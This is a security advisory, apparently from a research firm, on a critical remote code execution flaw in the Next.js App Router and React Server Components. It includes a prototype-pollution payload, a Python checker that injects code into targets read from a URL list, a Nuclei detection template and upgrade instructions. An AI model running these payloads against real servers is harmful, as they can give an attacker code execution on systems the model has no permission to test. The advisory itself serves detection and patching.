Uncategorized

Critical Advisory: Remote Code Execution in Next.js (CVE-2025-66478) with Working Exploit

Date: December 4, 2025
Severity: Critical (CVSS 10.0)
Components: Next.js App Router & React Server Components

We are alerting all customers to a critical Remote Code Execution (RCE) vulnerability affecting Next.js applications using the App Router. This vulnerability, tracked as CVE-2025-66478, stems from an upstream issue in the React Server Components (RSC) protocol (CVE-2025-55182). React provided a blog post with more details. The following blog post shows a proof-of-concept for the vulnerability using the Next.js framework, although other frameworks are affected.

Our security research team has analyzed the disclosure and successfully validated a working exploit against vulnerable environments. Immediate action is required.

Technical Analysis & Exploit Confirmation

The vulnerability resides in how the React Server Components (RSC) protocol deserializes user input on the server. Specifically, it allows untrusted inputs to influence the execution of server-side logic via the Next-Action header.

We have reviewed and tested the proof-of-concept (PoC) code targeting the upstream React vulnerability. The exploit works by sending a specially crafted POST request with a multipart/form-data payload to inject malicious property keys into the server’s internal object handling.

The confirmed exploit payload utilizes a prototype pollution vector:

# Snippet from confirmed working PoC
files = {
    "0": (None, '{"then":"$1:__proto__:constructor:constructor"}'),
    "1": (None, '{"x":1}'),
}

Snippet based on a confirmed working PoC from GitHub – msanft/CVE-2025-55182 PoC

In our tests, sending this payload to a vulnerable Next.js server allows the attacker to traverse the prototype chain (__proto__) to access the constructor. This effectively grants access to the Function constructor, enabling the execution of arbitrary JavaScript code within the context of the running server process.


import argparse
import json
import os

import requests

def check_target(url):
    crafted_chunk = {
        "then": "$1:__proto__:then",
        "status": "resolved_model",
        "reason": -1,
        "value": '{"then": "$B0"}',
        "_response": {
            "_prefix": "throw new Error('CVE-2025-55182-VULNERABLE');",
            "_formData": {
                "get": "$1:constructor:constructor",
            },
        },
    }

    files = {
        "0": (None, json.dumps(crafted_chunk)),
        "1": (None, '"$@0"'),
    }

    res = requests.post(url, files=files, headers={"Next-Action": "x"}, timeout=10)
    if "CVE-2025-55182-VULNERABLE" in res.text:
        print(f"[VULNERABLE] {url}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-55182 vulnerability checker")
    parser.add_argument("target", help="URL or file containing URLs (one per line)")
    args = parser.parse_args()

    if os.path.isfile(args.target):
        with open(args.target) as f:
            urls = [line.strip() for line in f if line.strip()]
    else:
        urls = [args.target]

    for url in urls:
        check_target(url)

Vulnerability Detection (Nuclei Template)

To assist security teams in identifying vulnerable instances, we have developed a high-fidelity Nuclei template.

Unlike generic scanners, this template mimics the specific “thenable” prototype pollution vector used in the working exploit. It checks for a specific server crash signature (E{"digest") triggered by the malicious deserialization attempt.

Save the following as CVE-2025-66478.yaml:

id: CVE-2025-66478-RCE

info:
  name: Next.js App Router / RSC - Prototype Pollution RCE
  author: Praetorian, Co-Authored with Gemini
  severity: critical
  description: |
    Detects the Next.js/React Server Components RCE (CVE-2025-66478 / CVE-2025-55182). 
    The template sends a malicious payload containing a "thenable" object targeting 
    the prototype chain. A 500 error combined with a specific RSC error digest 
    indicates the insecure deserializer is present and attempted to process the payload.
  reference:
    - https://nextjs.org/blog/CVE-2025-66478
  tags: cve,cve2025,nextjs,rce

variables:
  boundary: "----WebKitFormBoundary7MA4YWxkTrZu0gW"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Next-Action: 409defd89dd31eeb200d9ea02b1f325d25f5f5f3f0
        Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%2Cnull%2Cnull%5D%7D%2Cnull%2Cnull%2Ctrue%5D
        Content-Type: multipart/form-data; boundary={{boundary}}

        --{{boundary}}
        Content-Disposition: form-data; name="0"

        {"then":"$1:__proto__:constructor:constructor"}
        --{{boundary}}
        Content-Disposition: form-data; name="1"

        {"x":1}
        --{{boundary}}--

    matchers-condition: and
    matchers:
      # We expect a 500 because the payload is malicious but incomplete for full execution 
      # in a scanning context, causing the parser to choke on the prototype access.
      - type: status
        status:
          - 500

      # This confirms the error came from the React Server Components runtime
      - type: word
        part: body
        words:
          - 'E{"digest"'

      # Negative matcher to reduce false positives from standard 404s
      - type: status
        status:
          - 404
        negative: true

Affected Versions

This vulnerability affects applications using the App Router in the following versions:

- Next.js 15.x

- Next.js 16.x

- Next.js 14.3.0-canary.77 and later canary releases.

Note: Next.js 13.x, Next.js 14.x (stable), Pages Router applications, and the Edge Runtime are NOT affected.

Remediation Guidelines

There are no configuration workarounds available (such as disabling specific flags). You must upgrade the next package to a patched version immediately.

1. Identify your current version: Check your package.json or run npm list next.

2. Upgrade to a fixed version: Update to the latest patch release for your specific major version line:

- For Next.js 15.0.x: npm install next@15.0.5

- For Next.js 15.1.x: npm install next@15.1.9

- For Next.js 15.2.x: npm install next@15.2.6

- For Next.js 15.3.x: npm install next@15.3.6

- For Next.js 15.4.x: npm install next@15.4.8

- For Next.js 15.5.x: npm install next@15.5.7

- For Next.js 16.0.x: npm install next@16.0.7

3. Downgrade if on Canary: If you are using a vulnerable canary version (14.3.0-canary.77+), you must downgrade to the latest stable Next.js 14 release: